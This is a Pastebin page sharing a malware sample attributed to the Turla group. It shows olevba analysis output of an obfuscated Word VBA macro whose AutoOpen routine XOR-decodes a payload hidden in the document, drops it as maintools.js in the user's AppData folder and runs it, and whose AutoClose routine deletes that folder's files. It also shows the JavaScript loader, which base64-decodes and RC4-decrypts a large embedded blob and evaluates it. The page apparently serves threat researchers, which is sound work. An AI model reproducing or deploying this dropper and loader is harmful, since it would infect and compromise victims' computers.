SHARE
    TWEET
    hollerith

    turla backdoor

    Oct 4th, 2017
    1,231
    0
    Never
    Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
    1. ## Uploaded by @JohnLaTwC
    2. ## Sample Hash: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
    3. ## ---- Macro
    4. olevba 0.50 - http://decalage.info/python/oletools
    5. Flags Filename
    6. ----------- -----------------------------------------------------------------
    7. OLE:MASI-B-- ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
    8. ===============================================================================
    9. FILE: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
    10. Type: OLE
    11. -------------------------------------------------------------------------------
    12. VBA MACRO ThisDocument.cls
    13. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/ThisDocument'
    14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    15. (empty macro)
    16. -------------------------------------------------------------------------------
    17. VBA MACRO Module1.bas
    18. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/Module1'
    19. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    20. Public OBKHLrC3vEDjVL As String
    21. Public B8qen2T433Ds1bW As String
    22. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
    23. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
    24. THQNfU76nlSbtJ5nX8LY6 = 45
    25. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
    26. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
    27. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
    28. Next i
    29. Q7JOhn5pIl648L6V43V = True
    30. End Function
    31. Sub AutoClose()
    32. On Error Resume Next
    33. Kill OBKHLrC3vEDjVL
    34. On Error Resume Next
    35. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
    36. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
    37. Set R7Ks7ug4hRR2weOy7 = Nothing
    38. End Sub
    39. Sub AutoOpen()
    40. On Error GoTo MnOWqnnpKXfRO
    41. Dim NEnrKxf8l511
    42. Dim N18Eoi6OG6T2rNoVl41W As Long
    43. Dim M5wI32R3VF2g5B21EK4d As Long
    44. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
    45. NEnrKxf8l511 = FreeFile
    46. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
    47. Dim E2kvpmR17SI() As Byte
    48. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
    49. Get #NEnrKxf8l511, 1, E2kvpmR17SI
    50. Dim KqG31PcgwTc2oL47hjd7Oi As String
    51. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
    52. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
    53. Dim VUy5oj112fLw51h6S
    54. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
    55. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
    56. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
    57. Dim Y5t4Ul7o385qK4YDhr
    58. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
    59. GoTo MnOWqnnpKXfRO
    60. End If
    61. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
    62. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
    63. Exit For
    64. Next
    65. Dim Wk4o3X7x1134j() As Byte
    66. Dim KDXl18qY4rcT As Long
    67. KDXl18qY4rcT = 16827
    68. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
    69. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
    70. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
    71. GoTo MnOWqnnpKXfRO
    72. End If
    73. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
    74. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
    75. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
    76. B8qen2T433Ds1bW = Environ("appdata")
    77. End If
    78. Set R7Ks7ug4hRR2weOy7 = Nothing
    79. Dim K764B5Ph46Vh
    80. K764B5Ph46Vh = FreeFile
    81. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
    82. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
    83. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
    84. Close #K764B5Ph46Vh
    85. Erase Wk4o3X7x1134j
    86. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
    87. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
    88. ActiveDocument.Save
    89. Exit Sub
    90. MnOWqnnpKXfRO:
    91. Close #K764B5Ph46Vh
    92. ActiveDocument.Save
    93. End Sub
    94. Attribute VB_Name SHA1
    95. 5BD2E2B8DDC65931704C8C3EA57ADC2BB778F66A
    96. ##---- maintools.js
    97. try {
    98. var wvy1 = WScript.Arguments;
    99. var ssWZ = wvy1(0);
    100. var ES3c = y3zb();
    101. ES3c = LXv5(ES3c);
    102. ES3c = CpPT(ssWZ, ES3c);
    103. eval(ES3c);
    104. } catch (e) {
    105. WScript.Quit();
    106. }
    107. function MTvK(CgqD) {
    108. var XwH7 = CgqD.charCodeAt(0);
    109. if (XwH7 === 0x2B || XwH7 === 0x2D) return 62
    110. if (XwH7 === 0x2F || XwH7 === 0x5F) return 63
    111. if (XwH7 < 0x30) return -1
    112. if (XwH7 < 0x30 + 10) return XwH7 - 0x30 + 26 + 26
    113. if (XwH7 < 0x41 + 26) return XwH7 - 0x41
    114. if (XwH7 < 0x61 + 26) return XwH7 - 0x61 + 26
    115. }
    116. function LXv5(d27x) {
    117. var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    118. var i;
    119. var j;
    120. var n6T8;
    121. if (d27x.length % 4 > 0)
    122. return;
    123. var CHlB = d27x.length;
    124. var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) === '=' ? 1 : 0
    125. var mjqo = new Array(d27x.length * 3 / 4 - V8eR);
    126. var z8Ht = V8eR > 0 ? d27x.length - 4 : d27x.length;
    127. var t2JG = 0;
    128. function XGH6(b0tQ) {
    129. mjqo[t2JG++] = b0tQ;
    130. }
    131. for (i = 0, j = 0; i < z8Ht; i += 4, j += 3) {
    132. n6T8 = (MTvK(d27x.charAt(i)) << 18) | (MTvK(d27x.charAt(i + 1)) << 12) | (MTvK(d27x.charAt(i + 2)) << 6) | MTvK(d27x.charAt(i + 3));
    133. XGH6((n6T8 & 0xFF0000) >> 16)
    134. XGH6((n6T8 & 0xFF00) >> 8)
    135. XGH6(n6T8 & 0xFF)
    136. }
    137. if (V8eR === 2) {
    138. n6T8 = (MTvK(d27x.charAt(i)) << 2) | (MTvK(d27x.charAt(i + 1)) >> 4)
    139. XGH6(n6T8 & 0xFF)
    140. } else if (V8eR === 1) {
    141. n6T8 = (MTvK(d27x.charAt(i)) << 10) | (MTvK(d27x.charAt(i + 1)) << 4) | (MTvK(d27x.charAt(i + 2)) >> 2)
    142. XGH6((n6T8 >> 8) & 0xFF)
    143. XGH6(n6T8 & 0xFF)
    144. }
    145. return mjqo
    146. }
    147. function CpPT(bOe3, F5vZ) {
    148. var AWy7 = [];
    149. var V2Vl = 0;
    150. var qyCq;
    151. var mjqo = '';
    152. for (var i = 0; i < 256; i++) {
    153. AWy7[i] = i;
    154. }
    155. for (var i = 0; i < 256; i++) {
    156. V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;
    157. qyCq = AWy7[i];
    158. AWy7[i] = AWy7[V2Vl];
    159. AWy7[V2Vl] = qyCq;
    160. }
    161. var i = 0;
    162. var V2Vl = 0;
    163. for (var y = 0; y < F5vZ.length; y++) {
    164. i = (i + 1) % 256;
    165. V2Vl = (V2Vl + AWy7[i]) % 256;
    166. qyCq = AWy7[i];
    167. AWy7[i] = AWy7[V2Vl];
    168. AWy7[V2Vl] = qyCq;
    169. mjqo += String.fromCharCode(F5vZ[y] ^ AWy7[(AWy7[i] + AWy7[V2Vl]) % 256]);
    170. }
    171. return mjqo;
    172. }
    173. function y3zb() {
    174. var qGxZ = "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